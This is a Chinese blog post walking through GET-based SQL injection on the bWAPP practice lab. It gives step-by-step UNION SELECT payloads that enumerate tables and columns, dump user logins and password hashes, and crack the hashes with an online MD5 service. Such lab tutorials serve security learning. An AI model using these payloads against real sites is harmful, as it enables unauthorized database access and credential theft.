SQL 注入 GET

已于 2023-08-27 16:26:50 修改
阅读量313 收藏 1
点赞数
文章标签: sql oracle 数据库
于 2023-07-25 16:52:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63279914/article/details/131921549
版权

一、SQL注入

1. 看请求参数

如这个bwapp靶场:http://192.168.217.129:800/sqli_1.php?title=a&action=search

其中 a 为输入参数 通过sql注入 拿到用户名和密码

2.推算sql语句

一般为 select a,b,c,d,e(等 参数)from table( 表)where title = ? & action = search

3. 注入操作

  1. 利用 ‘ 单引号闭合 前方条件
  2. 利用#井号 后者 – SQL中的注释符 来注释掉后边内容,使其失效。
  3. 利用 union 联合查询语句
    1. 先使用 union select 1,2,3,… ; # 来测试回显数据时总共有几个字段
    2. 利用 user() database() 等函数
    3. 利用 information_schema 数据库查询数据库的主要信息

二、bWAPP靶场 SQL GET 注入

1. 测试有无SQL漏洞

输入 ’ 单引号测试

下面报:SQL语法错误 , 说明存在SQL注入漏洞

2. 用union测试有几个字段

利用union select 1,2,3…一个一个试

我这里试到了7 才显示数据

3. 根据字段类型 更换掉对应的数字

输入‘'union select 1,2,3,user(),database(),6,7;#

可以看到 5 对应的位置 成为了 数据库名称bWAPP ,4对应的位置成为了 用户名 root!@localhost

4.利用information_shema数据库

第一步

输入 ’’ union select 1,2,3,table_name,database(),6,7 from information_schema.tables where table_schema = database();#

可以查到 bWAPP数据库中所有的表名称

很明显 我们要找到 用户的用户名和密码 应该去对应的users表里查询

第二步

输入 ’’ union select 1,2,3,column_name,database(),6,7 from information_schema.columns where table_name = ‘users’ and table_schema = database();#

可以查看到users表里的字段 显然 login,password两个字段 就是要找的用户名和密码。

第三步

输入 ’’ union select 1,login,3,4,password,6,7 from users ;#

在这里插入图片描述

得到了login分别为A.I.M. bee 和 bwapp 密码是md5加密的 Character里面的字符串。

在 https://www.cmd5.com网站解密

A.I.M. bug

bee bug

bwapp 1234

总结

  2. ‘'union select 1,2,3,user(),database(),6,7;#

  3. ’’ union select 1,2,3,table_name,database(),6,7 from information_schema.tables where table_schema = database();#

  4. ’’ union select 1,2,3,column_name,database(),6,7 from information_schema.columns where table_name = ‘users’ and table_schema = database();#

  5. ’’ union select 1,login,3,4,password,6,7 from users ;#

零星_AagT
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中$_GET与$_POST过滤sql注入的方法
10-25
主要介绍了php中$_GET与$_POST过滤sql注入的方法,包含了addslashes_deep函数与数组的操作方法,是非常具有实用价值的技巧,需要的朋友可以参考下
SQL注入之GET型
最新发布
qq_51393133的博客
09-11 811
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 810
owasp十大漏洞中第一的sql注入
sql中GET参数的讲解
qq_41306131的博客
12-03 1868
SQL中接收参数 单引号包括 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1" 加上1’ 报错 可以用 1‘ -++ 或者 #(%23) 注释 这里单引号和#只是用来注释 报错的话需要 id=-1 整数型 $sql="SELECT *FROM users WHERE id=$id LIMIT 0,1"; 加上1‘ 报错为 使用’报错会...
12.SQL漏洞-注入类型&请求方法注入
mingyqf的博客
03-20 3993
【参数类型】 1、数字类型 select * from user where id=1 2、字符类型 select * from user where name=‘yucedu’ 过滤’(单引号)和"(双引号) 3、搜索类型 select * from user where name like ‘%yucedu%’ 只要有yucedu都会被搜索出来 过滤%(百分号)和’(单引号) 4、JSON类型 ★post提交方式中的一种数据交互格式 JSON格式: json={“name”:“yucedu” “a
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2851
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
简单的sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
SQL注入——GET类型
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-03 2888
SQL注入——GET类型 靶场地址 原理: sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们先在url栏测试一下,把id=1改成id=-1 结果页面就不显示了 表示存在sql注入漏洞我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合 接着,我在url轮流输入 order by 1,2,3.... 测试出它页面字段总数 在输入...
CTF-sql注入(get)
不知名白帽的博客
05-24 535
CTF-sql注入(get),实验环境:kali(192.168.20.128),靶机(192.168.20.131)。先探测敏感信息,再用owasp-zap进行漏洞扫描,然后根据漏洞类型,通过sqlmap进行漏洞的漏洞利用,再上传shell反弹权限
SQL注入之GET型常规注入
Jim的博客
08-14 4422
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
sql注入(get型)漏洞
qq_58970968的博客
03-29 1921
1,概念 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一,攻击过程 信息探测 kali里面主要下面三个探测方式: ·扫描主机服务信息以及服务版本 -- nmap -sV 靶场IP地址 如下图所示: ·快速扫描主机全部信息 -- nmap -T4 -A -v 靶场IP地址 这个与上面的比较起来扫描时间会更多,但信息会更
常见sql注入方式
wusuopuBUPT的专栏
04-02 1万+
1.没有正确过滤转义字符   在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。比方说,下面的这行代码就会演示这种漏洞:   statement := "SELECT* FROM users WHERE name = '" + userName + "';"   这种代码的设计目的是
PHP+MySQL实现简单的登录(SQL注入入门实验)
热门推荐
江左盟的博客
06-03 1万+
本实验是入门级的SQL注入实验,手工注入吧,用sqlmap就没意思了,简单过程:用户输入用户和密码然后提交,服务端收到用户和密码并查询数据库输出到页面。 一、创建数据库 create database web1; 创建两张表,一张保存登录用户和密码,另一张保存flag: create table test(user varchar(15),password varchar(16)); c...
php post注入,php中$_GET与$_POST过滤sql注入的方法
weixin_31315567的博客
03-10 191
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下:此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。主要实现代码如下:if (!get_magic_quotes_gpc()){if (!empty($_GET)){$_GET = addslashes_deep($_GET);}if (!empty($_POST)...
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 3937
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
sql注入getshell
09-09
SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。通过注入恶意的SQL代码,攻击者可以获取敏感信息,甚至可以在目标系统上执行任意命令,从而获得对系统的完全控制。通过getshell技术,攻击者可以在没有合法帐户的情况下,对目标系统进行远程控制。因此,避免SQL注入攻击和保护系统安全是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值